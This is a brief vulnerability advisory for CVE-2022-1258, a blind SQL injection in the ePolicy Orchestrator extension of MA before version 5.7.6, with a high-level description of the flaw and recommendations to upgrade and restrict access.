CVE-2022-1258

Name of the Vulnerable Software and Affected Versions ePolicy Orchestrator (ePO) extension of MA versions prior to 5.7.6

Description A blind SQL injection issue exists in the ePolicy Orchestrator (ePO) extension of MA, related to the failure to neutralize special elements used in SQL queries. This can be exploited by an authenticated administrator on ePO to perform arbitrary SQL queries in the back-end database, potentially leading to command execution on the server. An attacker can exploit this issue by sending specially crafted SQL queries.

Recommendations For versions prior to 5.7.6, update to version 5.7.6 or later to resolve the issue. As a temporary workaround, consider restricting access to the ePO extension to minimize the risk of exploitation. Additionally, restrict the ability to send specially crafted SQL queries to the back-end database until the issue is resolved.